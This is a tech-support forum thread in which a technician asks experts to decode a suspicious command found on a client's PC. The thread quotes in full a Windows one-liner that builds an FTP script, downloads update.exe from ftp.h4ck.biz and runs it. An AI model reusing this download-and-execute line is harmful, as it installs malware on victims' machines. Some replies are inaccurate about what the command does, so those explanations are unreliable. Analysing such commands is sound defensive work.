?
Solved

Decoding hackers code

Posted on 2010-01-06
7
Medium Priority
?
683 Views
Last Modified: 2012-05-08
Hi.

I loged onto a clients workstation today to find this in the run box

cmd /c echo open ftp.h4ck.biz 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit


Please could sombody decode this so i am able to understand this
0
Comment
Question by:apcsolutionsuk
  • 3
  • 3
7 Comments
 
LVL 17

Expert Comment

by:CSecurity
ID: 26189601
It's simple.

It connects to ftp.h4ck.biz in FTP port using windows FTP command
Then it enters username and password which is temp:temp
I mean username: temp
password: temp

then it downloads update.exe (malware/trojan)

Then it executes the update.exe (the malware) and exits.

That's all
0
 
LVL 22

Expert Comment

by:senad
ID: 26189617
It's downloading an update from a ftp site  to your C:\User\temp directory - running it and then deleting it - and then closing.
0
 
LVL 22

Accepted Solution

by:
senad earned 2000 total points
ID: 26189649
-n - Suppresses auto-login upon initial connection
-v - Suppresses verbose display of remote server responses
-s:filename - Specifies a text file containing ftp commands; the commands will automatically run after ftp starts.
0
Concerto Cloud for Software Providers & ISVs

Can Concerto Cloud Services help you focus on evolving your application offerings, while delivering the best cloud experience to your customers? From DevOps to revenue models and customer support, the answer is yes!

Learn how Concerto can help you.

 
LVL 22

Expert Comment

by:senad
ID: 26189657
ik - That's the name of the file containing FTP commands
0
 
LVL 17

Expert Comment

by:CSecurity
ID: 26189726
I should mention that there is no ftp.h4ck.biz

That's a prototype sample script for hackers. There is nothing to worry about this script
0
 

Expert Comment

by:South Mod
ID: 26502362
Hi apcsolutionsuk,

CSecurity has asked (at http://www.experts-exchange.com/Q_25117144.html) for an explanation of why you selected the answer(s) you selected for this question. It would appear the method you chose to close the question was not in keeping with EE policies, and you may like to consider selecting a more suitable answer as the solution or choosing a different disposition for the question altogether.

Experts,

I would appreciate your help in recommending a more suitable form of closure for this question.

Please make your recommendations as to how this request should be closed. Your recommendations may include:

1) Delete / No Refund
2) Delete / Points Refunded
3) Accept one or more comments as the solution.
4) PAQ the question and store it in the knowledgebase, refunding the points

In the case of #3, please be specific and include the specific comment ID(s) which answer this question. To make it easier for us to process this request, when posting the comment ID(s) to use, please post them in the format http:#aCommentID. For example, http:#a12345678.

When making your recommendation, or if you are unsure what you should recommend, please keep the following in mind:

* Was a solution to the original problem found? If so, points should be awarded to the comment(s) which solved the problem.
* Did the Author solve the problem themselves, with Expert input? If so, you should recommend the Author's comment become the 'Accepted' solution, but recommend other Expert comments which should receive a 'split' of their points for contributing to the final solution.
* Did the Author solve the problem without using any of the Expert advice? If so, the question should be PAQ'ed with points refunded.
* If no solution was found, the question should be deleted. Points will not be refunded if the Author has not followed-up on one or more of the Expert suggestions or requests in the thread.

A Moderator will check back on this in about 4 days, at which point we will expect to see an explanation from the Author and a number of recommendations from the participating Experts. If either is not forthcoming, we will assume the unresponsive party is no longer interested in the final disposition of this question, and may close the question in a way which disadvantages you. If neither party responds, it will be at our discretion that the question may be deleted.

If you have any questions, please also post them below and a Moderator will be more than willing to address your concerns.

SouthMod
Community Support Moderator
0
 
LVL 17

Expert Comment

by:CSecurity
ID: 26503306
1st comment of mine was explaining details in easy to understand details.
0

Featured Post

Fill in the form and get your FREE NFR key NOW!

Veeam is happy to provide a FREE NFR server license to certified engineers, trainers, and bloggers.  It allows for the non‑production use of Veeam Agent for Microsoft Windows. This license is valid for five workstations and two servers.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Technology opened people to different means of presenting information, but PowerPoint remains to be above competition. Know why PPT still works today.
Ever visit a website where you spotted a really cool looking Font, yet couldn't figure out which font family it belonged to, or how to get a copy of it for your own use? This article explains the process of doing exactly that, as well as showing how…
Windows 8 comes with a dramatically different user interface known as Metro. Notably missing from the new interface is a Start button and Start Menu. Many users do not like it, much preferring the interface of earlier versions — Windows 7, Windows X…
In this video, we discuss why the need for additional vertical screen space has become more important in recent years, namely, due to the transition in the marketplace of 4x3 computer screens to 16x9 and 16x10 screens (so-called widescreen format). …

749 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question